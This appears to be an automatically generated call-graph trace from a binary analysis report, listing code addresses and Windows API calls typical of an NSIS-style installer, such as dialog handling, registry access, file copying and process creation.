API calls 5298->5301 5303 402250 5298->5303 5300 401423 24 API calls 5299->5300 5300->5303 5302 4016b6 5301->5302 5302->5303 5304 4061ae 36 API calls 5302->5304 5304->5299 5561 401e7d 5562 402c41 17 API calls 5561->5562 5563 401e83 5562->5563 5564 402c41 17 API calls 5563->5564 5565 401e8c 5564->5565 5566 402c41 17 API calls 5565->5566 5567 401e95 5566->5567 5568 402c41 17 API calls 5567->5568 5569 401e9e 5568->5569 5570 401423 24 API calls 5569->5570 5571 401ea5 5570->5571 5578 405a14 ShellExecuteExW 5571->5578 5573 401ee7 5575 40288b 5573->5575 5579 406873 WaitForSingleObject 5573->5579 5576 401f01 CloseHandle 5576->5575 5578->5573 5580 40688d 5579->5580 5581 40689f GetExitCodeProcess 5580->5581 5582 4067fe 2 API calls 5580->5582 5581->5576 5583 406894 WaitForSingleObject 5582->5583 5583->5580 5584 4019ff 5585 402c41 17 API calls 5584->5585 5586 401a06 5585->5586 5587 402c41 17 API calls 5586->5587 5588 401a0f 5587->5588 5589 401a16 lstrcmpiW 5588->5589 5590 401a28 lstrcmpW 5588->5590 5591 401a1c 5589->5591 5590->5591 5592 401000 5593 401037 BeginPaint GetClientRect 5592->5593 5594 40100c DefWindowProcW 5592->5594 5596 4010f3 5593->5596 5597 401179 5594->5597 5598 401073 CreateBrushIndirect FillRect DeleteObject 5596->5598 5599 4010fc 5596->5599 5598->5596 5600 401102 CreateFontIndirectW 5599->5600 5601 401167 EndPaint 5599->5601 5600->5601 5602 401112 6 API calls 5600->5602 5601->5597 5602->5601 5603 401503 5604 40150b 5603->5604 5606 40151e 5603->5606 5605 402c1f 17 API calls 5604->5605 5605->5606 4530 402484 4541 402c81 4530->4541 4533 402c41 17 API calls 4534 402497 4533->4534 4535 4024a2 RegQueryValueExW 4534->4535 4539 40288b 4534->4539 4536 4024c8 RegCloseKey 4535->4536 4537 4024c2 4535->4537 4536->4539 4537->4536 4546 40632f wsprintfW 4537->4546 4542 402c41 17 API calls 4541->4542 4543 402c98 4542->4543 4544 406255 RegOpenKeyExW 4543->4544 4545 40248e 4544->4545 4545->4533 4546->4536 5607 70132c57 5608 70132c6f 5607->5608 5609 7013158f 2 API calls 5608->5609 5610 70132c8a 5609->5610 5611 402104 5612 402c41 17 API calls 5611->5612 5613 40210b 5612->5613 5614 402c41 17 API calls 5613->5614 5615 402115 5614->5615 5616 402c41 17 API calls 5615->5616 5617 40211f 5616->5617 5618 402c41 17 API calls 5617->5618 5619 402129 5618->5619 5620 402c41 17 API calls 5619->5620 5622 402133 5620->5622 5621 402172 CoCreateInstance 5626 402191 5621->5626 5622->5621 5623 402c41 17 API calls 5622->5623 5623->5621 5624 401423 24 API calls 5625 402250 5624->5625 5626->5624 5626->5625 4790 403e86 4791 403fd9 4790->4791 4792 403e9e 4790->4792 4794 403fea GetDlgItem GetDlgItem 4791->4794 4812 40402a 4791->4812 4792->4791 4793 403eaa 4792->4793 4795 403eb5 SetWindowPos 4793->4795 4796 403ec8 4793->4796 4797 40435f 18 API calls 4794->4797 4795->4796 4800 403ee5 4796->4800 4801 403ecd ShowWindow 4796->4801 4802 404014 SetClassLongW 4797->4802 4798 404084 4799 4043ab SendMessageW 4798->4799 4804 403fd4 4798->4804 4828 404096 4799->4828 4805 403f07 4800->4805 4806 403eed DestroyWindow 4800->4806 4801->4800 4807 40140b 2 API calls 4802->4807 4803 401389 2 API calls 4810 40405c 4803->4810 4808 403f0c SetWindowLongW 4805->4808 4809 403f1d 4805->4809 4811 404309 4806->4811 4807->4812 4808->4804 4813 403fc6 4809->4813 4814 403f29 GetDlgItem 4809->4814 4810->4798 4815 404060 SendMessageW 4810->4815 4811->4804 4821 404319 ShowWindow 4811->4821 4812->4798 4812->4803 4871 4043c6 4813->4871 4818 403f59 4814->4818 4819 403f3c SendMessageW IsWindowEnabled 4814->4819 4815->4804 4816 40140b 2 API calls 4816->4828 4817 4042ea DestroyWindow EndDialog 4817->4811 4823 403f66 4818->4823 4825 403fad SendMessageW 4818->4825 4826 403f79 4818->4826 4835 403f5e 4818->4835 4819->4804 4819->4818 4821->4804 4822 40640a 17 API calls 4822->4828 4823->4825 4823->4835 4825->4813 4829 403f81 4826->4829 4830 403f96 4826->4830 4827 403f94 4827->4813 4828->4804 4828->4816 4828->4817 4828->4822 4831 40435f 18 API calls 4828->4831 4852 40422a DestroyWindow 4828->4852 4862 40435f 4828->4862 4833 40140b 2 API calls 4829->4833 4832 40140b 2 API calls 4830->4832 4831->4828 4834 403f9d 4832->4834 4833->4835 4834->4813 4834->4835 4868 404338 4835->4868 4837 404111 GetDlgItem 4838 404126 4837->4838 4839 40412e ShowWindow KiUserCallbackDispatcher 4837->4839 4838->4839 4865 404381 EnableWindow 4839->4865 4841 404158 EnableWindow 4846 40416c 4841->4846 4842 404171 GetSystemMenu EnableMenuItem SendMessageW 4843 4041a1 SendMessageW 4842->4843 4842->4846 4843->4846 4845 403e67 18 API calls 4845->4846 4846->4842 4846->4845 4866 404394 SendMessageW 4846->4866 4867 4063e8 lstrcpynW 4846->4867 4848 4041d0 lstrlenW 4849 40640a 17 API calls 4848->4849 4850 4041e6 SetWindowTextW 4849->4850 4851 401389 2 API calls 4850->4851 4851->4828 4852->4811 4853 404244 CreateDialogParamW 4852->4853 4853->4811 4854 404277 4853->4854 4855 40435f 18 API calls 4854->4855 4856 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4855->4856 4857 401389 2 API calls 4856->4857 4858 4042c8 4857->4858 4858->4804 4859 4042d0 ShowWindow 4858->4859 4860 4043ab SendMessageW 4859->4860 4861 4042e8 4860->4861 4861->4811 4863 40640a 17 API calls 4862->4863 4864 40436a SetDlgItemTextW 4863->4864 4864->4837 4865->4841 4866->4846 4867->4848 4869 404345 SendMessageW 4868->4869 4870 40433f 4868->4870 4869->4827 4870->4869 4872 404489 4871->4872 4873 4043de GetWindowLongW 4871->4873 4872->4804 4873->4872 4874 4043f3 4873->4874 4874->4872 4875 404420 GetSysColor 4874->4875 4876 404423 4874->4876 4875->4876 4877 404433 SetBkMode 4876->4877 4878 404429 SetTextColor 4876->4878 4879 404451 4877->4879 4880 40444b GetSysColor 4877->4880 4878->4877 4881 404462 4879->4881 4882 404458 SetBkColor 4879->4882 4880->4879 4881->4872 4883 404475 DeleteObject 4881->4883 4884 40447c CreateBrushIndirect 4881->4884 4882->4881 4883->4884 4884->4872 5627 401f06 5628 402c41 17 API calls 5627->5628 5629 401f0c 5628->5629 5630 405450 24 API calls 5629->5630 5631 401f16 5630->5631 5632 4059d1 2 API calls 5631->5632 5633 401f1c 5632->5633 5635 406873 5 API calls 5633->5635 5637 40288b 5633->5637 5639 401f3f CloseHandle 5633->5639 5636 401f31 5635->5636 5636->5639 5640 40632f wsprintfW 5636->5640 5639->5637 5640->5639 5641 701316d4 5642 70131703 5641->5642 5643 70131b5f 22 API calls 5642->5643 5644 7013170a 5643->5644 5645 70131711 5644->5645 5646 7013171d 5644->5646 5647 70131272 2 API calls 5645->5647 5648 70131727 5646->5648 5649 70131744 5646->5649 5652 7013171b 5647->5652 5653 7013153d 3 API calls 5648->5653 5650 7013174a 5649->5650 5651 7013176e 5649->5651 5654 701315b4 3 API calls 5650->5654 5655 7013153d 3 API calls 5651->5655 5656 7013172c 5653->5656 5657 7013174f 5654->5657 5655->5652 5658 701315b4 3 API calls 5656->5658 5659 70131272 2 API calls 5657->5659 5660 70131732 5658->5660 5661 70131755 GlobalFree 5659->5661 5662 70131272 2 API calls 5660->5662 5661->5652 5663 70131769 GlobalFree 5661->5663 5664 70131738 GlobalFree 5662->5664 5663->5652 5664->5652 5665 404809 5666 404819 5665->5666 5667 40483f 5665->5667 5668 40435f 18 API calls 5666->5668 5669 4043c6 8 API calls 5667->5669 5670 404826 SetDlgItemTextW 5668->5670 5671 40484b 5669->5671 5670->5667 5672 701318d9 5673 701318fc 5672->5673 5674 70131931 GlobalFree 5673->5674 5675 70131943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5673->5675 5674->5675 5676 70131272 2 API calls 5675->5676 5677 70131ace GlobalFree GlobalFree 5676->5677 5678 70131058 5679 70131074 5678->5679 5680 701310dd 5679->5680 5681 70131516 GlobalFree 5679->5681 5682 70131092 5679->5682 5681->5682 5683 70131516 GlobalFree 5682->5683 5684 701310a2 5683->5684 5685 701310b2 5684->5685 5686 701310a9 GlobalSize 5684->5686 5687 701310b6 GlobalAlloc 5685->5687 5688 701310c7 5685->5688 5686->5685 5689 7013153d 3 API calls 5687->5689 5690 701310d2 GlobalFree 5688->5690 5689->5688 5690->5680 5691 40190c 5692 401943 5691->5692 5693 402c41 17 API calls 5692->5693 5694 401948 5693->5694 5695 405afa 67 API calls 5694->5695 5696 401951 5695->5696 5697 40230c 5698 402314 5697->5698 5699 40231a 5697->5699 5700 402c41 17 API calls 5698->5700 5701 402328 5699->5701 5702 402c41 17 API calls 5699->5702 5700->5699 5704 402c41 17 API calls 5701->5704 5706 402336 5701->5706 5702->5701 5703 402c41 17 API calls 5705 40233f WritePrivateProfileStringW 5703->5705 5704->5706 5706->5703 5707 401f8c 5708 402c41 17 API calls 5707->5708 5709 401f93 5708->5709 5710 4067c2 5 API calls 5709->5710 5711 401fa2 5710->5711 5712 402026 5711->5712 5713 401fbe GlobalAlloc 5711->5713 5713->5712 5714 401fd2 5713->5714 5715 4067c2 5 API calls 5714->5715 5716 401fd9 5715->5716 5717 4067c2 5 API calls 5716->5717 5718 401fe3 5717->5718 5718->5712 5722 40632f wsprintfW 5718->5722 5720 402018 5723 40632f wsprintfW 5720->5723 5722->5720 5723->5712 4986 40238e 4987 4023c1 4986->4987 4988 402396 4986->4988 4989 402c41 17 API calls 4987->4989 4990 402c81 17 API calls 4988->4990 4991 4023c8 4989->4991 4992 40239d 4990->4992 4998 402cff 4991->4998 4994 4023a7 4992->4994 4995 4023d5 4992->4995 4996 402c41 17 API calls 4994->4996 4997 4023ae RegDeleteValueW RegCloseKey 4996->4997 4997->4995 4999 402d13 4998->4999 5000 402d0c 4998->5000 4999->5000 5002 402d44 4999->5002 5000->4995 5003 406255 RegOpenKeyExW 5002->5003 5004 402d72 5003->5004 5005 402d76 5004->5005 5006 402dec 5004->5006 5007 402d98 RegEnumKeyW 5005->5007 5008 402daf RegCloseKey 5005->5008 5009 402dd0 RegCloseKey 5005->5009 5011 402d44 6 API calls 5005->5011 5006->5000 5007->5005 5007->5008 5010 4067c2 5 API calls 5008->5010 5009->5006 5012 402dbf 5010->5012 5011->5005 5013 402de0 RegDeleteKeyW 5012->5013 5014 402dc3 5012->5014 5013->5006 5014->5006 5724 40190f 5725 402c41 17 API calls 5724->5725 5726 401916 5725->5726 5727 405a4e MessageBoxIndirectW 5726->5727 5728 40191f 5727->5728 5729 40558f 5730 4055b0 GetDlgItem GetDlgItem GetDlgItem 5729->5730 5731 405739 5729->5731 5774 404394 SendMessageW 5730->5774 5733 405742 GetDlgItem CreateThread CloseHandle 5731->5733 5734 40576a 5731->5734 5733->5734 5736 405795 5734->5736 5737 405781 ShowWindow ShowWindow 5734->5737 5738 4057ba 5734->5738 5735 405620 5743 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5735->5743 5740 4057a9 5736->5740 5741 4057cf ShowWindow 5736->5741 5744 4057f5 5736->5744 5776 404394 SendMessageW 5737->5776 5742 4043c6 8 API calls 5738->5742 5745 404338 SendMessageW 5740->5745 5747 4057e1 5741->5747 5748 4057ef 5741->5748 5746 4057c8 5742->5746 5749 405695 5743->5749 5750 405679 SendMessageW SendMessageW 5743->5750 5744->5738 5751 405803 SendMessageW 5744->5751 5745->5738 5755 405450 24 API calls 5747->5755 5756 404338 SendMessageW 5748->5756 5752 4056a8 5749->5752 5753 40569a SendMessageW 5749->5753 5750->5749 5751->5746 5754 40581c CreatePopupMenu 5751->5754 5758 40435f 18 API calls 5752->5758 5753->5752 5757 40640a 17 API calls 5754->5757 5755->5748 5756->5744 5759 40582c AppendMenuW 5757->5759 5760 4056b8 5758->5760 5761 405849 GetWindowRect 5759->5761 5762 40585c TrackPopupMenu 5759->5762 5763 4056c1 ShowWindow 5760->5763 5764 4056f5 GetDlgItem SendMessageW 5760->5764 5761->5762 5762->5746 5765 405877 5762->5765 5766 4056e4 5763->5766 5767 4056d7 ShowWindow 5763->5767 5764->5746 5768 40571c SendMessageW SendMessageW 5764->5768 5769 405893 SendMessageW 5765->5769 5775 404394 SendMessageW 5766->5775 5767->5766 5768->5746 5769->5769 5770 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5769->5770 5772 4058d5 SendMessageW 5770->5772 5772->5772 5773 4058fe GlobalUnlock SetClipboardData CloseClipboard 5772->5773 5773->5746 5774->5735 5775->5764 5776->5736 5777 401491 5778 405450 24 API calls 5777->5778 5779 401498 5778->5779 5787 401d14 5788 402c1f 17 API calls 5787->5788 5789 401d1b 5788->5789 5790 402c1f 17 API calls 5789->5790 5791 401d27 GetDlgItem 5790->5791 5792 402592 5791->5792 5793 404495 lstrcpynW lstrlenW 5794 403a96 5795 403aa1 5794->5795 5796 403aa5 5795->5796 5797 403aa8 GlobalAlloc 5795->5797 5797->5796 5798 402598 5799 4025c7 5798->5799 5800 4025ac 5798->5800 5802 4025fb 5799->5802 5803 4025cc 5799->5803 5801 402c1f 17 API calls 5800->5801 5810 4025b3 5801->5810 5805 402c41 17 API calls 5802->5805 5804 402c41 17 API calls 5803->5804 5806 4025d3 WideCharToMultiByte lstrlenA 5804->5806 5807 402602 lstrlenW 5805->5807 5806->5810 5807->5810 5808 40262f 5809 402645 5808->5809 5811 405f90 WriteFile 5808->5811 5810->5808 5810->5809 5812 405fbf 5 API calls 5810->5812 5811->5809 5812->5808 5813 40451e 5814 404536 5813->5814 5820 404650 5813->5820 5821 40435f 18 API calls 5814->5821 5815 4046ba 5816 404784 5815->5816 5817 4046c4 GetDlgItem 5815->5817 5822 4043c6 8 API calls 5816->5822 5818 404745 5817->5818 5819 4046de 5817->5819 5818->5816 5826 404757 5818->5826 5819->5818 5825 404704 SendMessageW LoadCursorW SetCursor 5819->5825 5820->5815 5820->5816 5823 40468b GetDlgItem SendMessageW 5820->5823 5824 40459d 5821->5824 5837 40477f 5822->5837 5846 404381 EnableWindow 5823->5846 5828 40435f 18 API calls 5824->5828 5847 4047cd 5825->5847 5831 40476d 5826->5831 5832 40475d SendMessageW 5826->5832 5829 4045aa CheckDlgButton 5828->5829 5844 404381 EnableWindow 5829->5844 5836 404773 SendMessageW 5831->5836 5831->5837 5832->5831 5833 4046b5 5838 4047a9 SendMessageW 5833->5838 5836->5837 5838->5815 5839 4045c8 GetDlgItem 5845 404394 SendMessageW 5839->5845 5841 4045de SendMessageW 5842 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5841->5842 5843 4045fb GetSysColor 5841->5843 5842->5837 5843->5842 5844->5839 5845->5841 5846->5833 5850 405a14 ShellExecuteExW 5847->5850 5849 404733 LoadCursorW SetCursor 5849->5818 5850->5849 5851 40149e 5852 4014ac PostQuitMessage 5851->5852 5853 4022f7 5851->5853 5852->5853 5854 401c1f 5855 402c1f 17 API calls 5854->5855 5856 401c26 5855->5856 5857 402c1f 17 API calls 5856->5857 5858 401c33 5857->5858 5859 401c48 5858->5859 5860 402c41 17 API calls 5858->5860 5863 402c41 17 API calls 5859->5863 5866 401c58 5859->5866 5860->5859 5861 401c63 5864 402c1f 17 API calls 5861->5864 5862 401caf 5865 402c41 17 API calls 5862->5865 5863->5866 5867 401c68 5864->5867 5868 401cb4 5865->5868 5866->5861 5866->5862 5869 402c1f 17 API calls 5867->5869 5870 402c41 17 API calls 5868->5870 5871 401c74 5869->5871 5872 401cbd FindWindowExW 5870->5872 5873 401c81 SendMessageTimeoutW 5871->5873 5874 401c9f SendMessageW 5871->5874 5875 401cdf 5872->5875 5873->5875 5874->5875 5876 402aa0 SendMessageW 5877 402ac5 5876->5877 5878 402aba InvalidateRect 5876->5878 5878->5877 5879 402821 5880 402827 5879->5880 5881 402ac5 5880->5881 5882 40282f FindClose 5880->5882 5882->5881 5883 4015a3 5884 402c41 17 API calls 5883->5884 5885 4015aa SetFileAttributesW 5884->5885 5886 4015bc 5885->5886 4547 4034a5 SetErrorMode GetVersion 4548 4034e4 4547->4548 4549 4034ea 4547->4549 4550 4067c2 5 API calls 4548->4550 4551 406752 3 API calls 4549->4551 4550->4549 4552 403500 lstrlenA 4551->4552 4552->4549 4553 403510 4552->4553 4554 4067c2 5 API calls 4553->4554 4555 403517 4554->4555 4556 4067c2 5 API calls 4555->4556 4557 40351e 4556->4557 4558 4067c2 5 API calls 4557->4558 4559 40352a #17 OleInitialize SHGetFileInfoW 4558->4559 4637 4063e8 lstrcpynW 4559->4637 4562 403576 GetCommandLineW 4638 4063e8 lstrcpynW 4562->4638 4564 403588 4565 405cea CharNextW 4564->4565 4566 4035ad CharNextW 4565->4566 4567 4036d7 GetTempPathW 4566->4567 4574 4035c6 4566->4574 4639 403474 4567->4639 4569 4036ef 4570 4036f3 GetWindowsDirectoryW lstrcatW 4569->4570 4571 403749 DeleteFileW 4569->4571 4575 403474 12 API calls 4570->4575 4649 402f30 GetTickCount GetModuleFileNameW 4571->4649 4572 405cea CharNextW 4572->4574 4574->4572 4579 4036c2 4574->4579 4581 4036c0 4574->4581 4577 40370f 4575->4577 4576 40375d 4582 403800 4576->4582 4586 405cea CharNextW 4576->4586 4632 403810 4576->4632 4577->4571 4578 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4577->4578 4580 403474 12 API calls 4578->4580 4735 4063e8 lstrcpynW 4579->4735 4584 403741 4580->4584 4581->4567 4679 403ad8 4582->4679 4584->4571 4584->4632 4603 40377c 4586->4603 4589 40394a 4591 403952 GetCurrentProcess OpenProcessToken 4589->4591 4592 4039ce ExitProcess 4589->4592 4590 40382a 4747 405a4e 4590->4747 4597 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4591->4597 4598 40399e 4591->4598 4594 403840 4601 4059b9 5 API calls 4594->4601 4595 4037da 4600 405dc5 18 API calls 4595->4600 4597->4598 4602 4067c2 5 API calls 4598->4602 4604 4037e6 4600->4604 4605 403845 lstrcatW 4601->4605 4606 4039a5 4602->4606 4603->4594 4603->4595 4604->4632 4736 4063e8 lstrcpynW 4604->4736 4607 403861 lstrcatW lstrcmpiW 4605->4607 4608 403856 lstrcatW 4605->4608 4609 4039ba ExitWindowsEx 4606->4609 4612 4039c7 4606->4612 4611 40387d 4607->4611 4607->4632 4608->4607 4609->4592 4609->4612 4614 403882 4611->4614 4615 403889 4611->4615 4616 40140b 2 API calls 4612->4616 4613 4037f5 4737 4063e8 lstrcpynW 4613->4737 4618 40591f 4 API calls 4614->4618 4619 40599c 2 API calls 4615->4619 4616->4592 4620 403887 4618->4620 4621 40388e SetCurrentDirectoryW 4619->4621 4620->4621 4622 4038a9 4621->4622 4623 40389e 4621->4623 4752 4063e8 lstrcpynW 4622->4752 4751 4063e8 lstrcpynW 4623->4751 4626 40640a 17 API calls 4627 4038e8 DeleteFileW 4626->4627 4628 4038f5 CopyFileW 4627->4628 4634 4038b7 4627->4634 4628->4634 4629 40393e 4630 4061ae 36 API calls 4629->4630 4630->4632 4631 4061ae 36 API calls 4631->4634 4738 4039e6 4632->4738 4633 40640a 17 API calls 4633->4634 4634->4626 4634->4629 4634->4631 4634->4633 4636 403929 CloseHandle 4634->4636 4753 4059d1 CreateProcessW 4634->4753 4636->4634 4637->4562 4638->4564 4640 40667c 5 API calls 4639->4640 4642 403480 4640->4642 4641 40348a 4641->4569 4642->4641 4643 405cbd 3 API calls 4642->4643 4644 403492 4643->4644 4645 40599c 2 API calls 4644->4645 4646 403498 4645->4646 4756 405f0d 4646->4756 4760 405ede GetFileAttributesW CreateFileW 4649->4760 4651 402f73 4678 402f80 4651->4678 4761 4063e8 lstrcpynW 4651->4761 4653 402f96 4654 405d09 2 API calls 4653->4654 4655 402f9c 4654->4655 4762 4063e8 lstrcpynW 4655->4762 4657 402fa7 GetFileSize 4658 4030a8 4657->4658 4660 402fbe 4657->4660 4659 402e8e 32 API calls 4658->4659 4661 4030af 4659->4661 4660->4658 4662 403447 ReadFile 4660->4662 4664 403143 4660->4664 4671 402e8e 32 API calls 4660->4671 4660->4678 4663 4030eb GlobalAlloc 4661->4663 4661->4678 4764 40345d SetFilePointer 4661->4764 4662->4660 4665 403102 4663->4665 4666 402e8e 32 API calls 4664->4666 4669 405f0d 2 API calls 4665->4669 4666->4678 4668 4030cc 4670 403447 ReadFile 4668->4670 4672 403113 CreateFileW 4669->4672 4673 4030d7 4670->4673 4671->4660 4674 40314d 4672->4674 4672->4678 4673->4663 4673->4678 4763 40345d SetFilePointer 4674->4763 4676 40315b 4677 4031d6 44 API calls 4676->4677 4677->4678 4678->4576 4678->4678 4680 4067c2 5 API calls 4679->4680 4681 403aec 4680->4681 4682 403af2 4681->4682 4683 403b04 4681->4683 4773 40632f wsprintfW 4682->4773 4684 4062b6 3 API calls 4683->4684 4685 403b34 4684->4685 4686 403b53 lstrcatW 4685->4686 4688 4062b6 3 API calls 4685->4688 4689 403b02 4686->4689 4688->4686 4765 403dae 4689->4765 4692 405dc5 18 API calls 4694 403b85 4692->4694 4693 403c19 4695 405dc5 18 API calls 4693->4695 4694->4693 4696 4062b6 3 API calls 4694->4696 4697 403c1f 4695->4697 4698 403bb7 4696->4698 4699 403c2f LoadImageW 4697->4699 4702 40640a 17 API calls 4697->4702 4698->4693 4705 403bd8 lstrlenW 4698->4705 4709 405cea CharNextW 4698->4709 4700 403cd5 4699->4700 4701 403c56 RegisterClassW 4699->4701 4704 40140b 2 API calls 4700->4704 4703 403c8c SystemParametersInfoW CreateWindowExW 4701->4703 4734 403cdf 4701->4734 4702->4699 4703->4700 4708 403cdb 4704->4708 4706 403be6 lstrcmpiW 4705->4706 4707 403c0c 4705->4707 4706->4707 4710 403bf6 GetFileAttributesW 4706->4710 4711 405cbd 3 API calls 4707->4711 4714 403dae 18 API calls 4708->4714 4708->4734 4712 403bd5 4709->4712 4713 403c02 4710->4713 4715 403c12 4711->4715 4712->4705 4713->4707 4716 405d09 2 API calls 4713->4716 4717 403cec 4714->4717 4774 4063e8 lstrcpynW 4715->4774 4716->4707 4719 403cf8 ShowWindow 4717->4719 4720 403d7b 4717->4720 4722 406752 3 API calls 4719->4722 4775 405523 OleInitialize 4720->4775 4724 403d10 4722->4724 4723 403d81 4725 403d85 4723->4725 4726 403d9d 4723->4726 4727 403d1e GetClassInfoW 4724->4727 4729 406752 3 API calls 4724->4729 4733 40140b 2 API calls 4725->4733 4725->4734 4728 40140b 2 API calls 4726->4728 4730 403d32 GetClassInfoW RegisterClassW 4727->4730 4731 403d48 DialogBoxParamW 4727->4731 4728->4734 4729->4727 4730->4731 4732 40140b 2 API calls 4731->4732 4732->4734 4733->4734 4734->4632 4735->4581 4736->4613 4737->4582 4739 403a01 4738->4739 4740 4039f7 CloseHandle 4738->4740 4741 403a15 4739->4741 4742 403a0b CloseHandle 4739->4742 4740->4739 4786 403a43 4741->4786 4742->4741 4745 405afa 67 API calls 4746 403819 OleUninitialize 4745->4746 4746->4589 4746->4590 4748 405a63 4747->4748 4749 405a77 MessageBoxIndirectW 4748->4749 4750 403838 ExitProcess 4748->4750 4749->4750 4751->4622 4752->4634 4754 405a10 4753->4754 4755 405a04 CloseHandle 4753->4755 4754->4634 4755->4754 4757 405f1a GetTickCount GetTempFileNameW 4756->4757 4758 405f50 4757->4758 4759 4034a3 4757->4759 4758->4757 4758->4759 4759->4569 4760->4651 4761->4653 4762->4657 4763->4676 4764->4668 4766 403dc2 4765->4766 4782 40632f wsprintfW 4766->4782 4768 403e33 4783 403e67 4768->4783 4770 403b63 4770->4692 4771 403e38 4771->4770 4772 40640a 17 API calls 4771->4772 4772->4771 4773->4689 4774->4693 4776 4043ab SendMessageW 4775->4776 4779 405546 4776->4779 4777 40556d 4778 4043ab SendMessageW 4777->4778 4780 40557f OleUninitialize 4778->4780 4779->4777 4781 401389 2 API calls 4779->4781 4780->4723 4781->4779 4782->4768 4784 40640a 17 API calls 4783->4784 4785 403e75 SetWindowTextW 4784->4785 4785->4771 4787 403a51 4786->4787 4788 403a1a 4787->4788 4789 403a56 FreeLibrary GlobalFree 4787->4789 4788->4745 4789->4788 4789->4789 5887 404ba6 5888 404bd2 5887->5888 5889 404bb6 5887->5889 5890 404c05 5888->5890 5891 404bd8 SHGetPathFromIDListW 5888->5891 5898 405a32 GetDlgItemTextW 5889->5898 5893 404bef SendMessageW 5891->5893 5894 404be8 5891->5894 5893->5890 5896 40140b 2 API calls 5894->5896 5895 404bc3 SendMessageW 5895->5888 5896->5893 5898->5895 5913 4029a8 5914 402c1f 17 API calls 5913->5914 5915 4029ae 5914->5915 5916 4029d5 5915->5916 5917 4029ee 5915->5917 5923 40288b 5915->5923 5920 4029da 5916->5920 5926 4029eb 5916->5926 5918 402a08 5917->5918 5919 4029f8 5917->5919 5922 40640a 17 API calls 5918->5922 5921 402c1f 17 API calls 5919->5921 5927 4063e8 lstrcpynW 5920->5927 5921->5926 5922->5926 5926->5923 5928 40632f wsprintfW 5926->5928 5927->5923 5928->5923 5929 4028ad 5930 402c41 17 API calls 5929->5930 5932 4028bb 5930->5932 5931 4028d1 5934 405eb9 2 API calls 5931->5934 5932->5931 5933 402c41 17 API calls 5932->5933 5933->5931 5935 4028d7 5934->5935 5957 405ede GetFileAttributesW CreateFileW 5935->5957 5937 4028e4 5938 4028f0 GlobalAlloc 5937->5938 5939 402987 5937->5939 5942 402909 5938->5942 5943 40297e CloseHandle 5938->5943 5940 4029a2 5939->5940 5941 40298f DeleteFileW 5939->5941 5941->5940 5958 40345d SetFilePointer 5942->5958 5943->5939 5945 40290f 5946 403447 ReadFile 5945->5946 5947 402918 GlobalAlloc 5946->5947 5948 402928 5947->5948 5949 40295c 5947->5949 5950 4031d6 44 API calls 5948->5950 5951 405f90 WriteFile 5949->5951 5956 402935 5950->5956 5952 402968 GlobalFree 5951->5952 5953 4031d6 44 API calls 5952->5953 5955 40297b 5953->5955 5954 402953 GlobalFree 5954->5949 5955->5943 5956->5954 5957->5937 5958->5945 5959 701322fd 5960 70132367 5959->5960 5961 70132372 GlobalAlloc 5960->5961 5962 70132391 5960->5962 5961->5960 5970 401a30 5971 402c41 17 API calls 5970->5971 5972 401a39 ExpandEnvironmentStringsW 5971->5972 5973 401a60 5972->5973 5974 401a4d 5972->5974 5974->5973 5975 401a52 lstrcmpW 5974->5975 5975->5973 5066 402032 5067 402044 5066->5067 5068 4020f6 5066->5068 5069 402c41 17 API calls 5067->5069 5070 401423 24 API calls 5068->5070 5071 40204b 5069->5071 5077 402250 5070->5077 5072 402c41 17 API calls 5071->5072 5073 402054 5072->5073 5074 40206a LoadLibraryExW 5073->5074 5075 40205c GetModuleHandleW 5073->5075 5074->5068 5076 40207b 5074->5076 5075->5074 5075->5076 5089 406831 WideCharToMultiByte 5076->5089 5080 4020c5 5082 405450 24 API calls 5080->5082 5081 40208c 5083 402094 5081->5083 5084 4020ab 5081->5084 5086 40209c 5082->5086 5085 401423 24 API calls 5083->5085 5092 70131777 5084->5092 5085->5086 5086->5077 5087 4020e8 FreeLibrary 5086->5087 5087->5077 5090 40685b GetProcAddress 5089->5090 5091 402086 5089->5091 5090->5091 5091->5080 5091->5081 5093 701317aa 5092->5093 5134 70131b5f 5093->5134 5095 701317b1 5096 701318d6 5095->5096 5097 701317c2 5095->5097 5098 701317c9 5095->5098 5096->5086 5184 70132352 5097->5184 5168 70132394 5098->5168 5103 701317ee 5104 7013180f 5103->5104 5105 7013182d 5103->5105 5197 70132569 5104->5197 5106 70131833 5105->5106 5107 7013187e 5105->5107 5216 701315c6 5106->5216 5115 70132569 10 API calls 5107->5115 5108 701317f8 5108->5103 5194 70132d37 5108->5194 5110 701317df 5111 701317e5 5110->5111 5117 701317f0 5110->5117 5111->5103 5178 70132aac 5111->5178 5120 7013186f 5115->5120 5116 70131815 5208 701315b4 5116->5208 5188 70132724 5117->5188 5126 701318c5 5120->5126 5222 7013252c 5120->5222 5122 701317f6 5122->5103 5123 70132569 10 API calls 5123->5120 5126->5096 5128 701318cf GlobalFree 5126->5128 5128->5096 5131 701318b1 5131->5126 5226 7013153d wsprintfW 5131->5226 5132 701318aa FreeLibrary 5132->5131 5229 7013121b GlobalAlloc 5134->5229 5136 70131b83 5230 7013121b GlobalAlloc 5136->5230 5138 70131da9 GlobalFree GlobalFree GlobalFree 5139 70131dc6 5138->5139 5155 70131e10 5138->5155 5141 70132192 5139->5141 5149 70131ddb 5139->5149 5139->5155 5140 70131c64 GlobalAlloc 5163 70131b8e 5140->5163 5142 701321b4 GetModuleHandleW 5141->5142 5141->5155 5145 701321c5 LoadLibraryW 5142->5145 5146 701321da 5142->5146 5143 70131caf lstrcpyW 5148 70131cb9 lstrcpyW 5143->5148 5144 70131ccd GlobalFree 5144->5163 5145->5146 5145->5155 5237 7013161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5146->5237 5148->5163 5149->5155 5233 7013122c 5149->5233 5150 7013222c 5153 70132239 lstrlenW 5150->5153 5150->5155 5151 701320ec 5151->5155 5161 70132134 lstrcpyW 5151->5161 5238 7013161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5153->5238 5154 70132064 5236 7013121b GlobalAlloc 5154->5236 5155->5095 5156 701321ec 5156->5150 5166 70132216 GetProcAddress 5156->5166 5159 70131d0b 5159->5163 5231 7013158f GlobalSize GlobalAlloc 5159->5231 5160 70131fa5 GlobalFree 5160->5163 5161->5155 5162 70132253 5162->5155 5163->5138 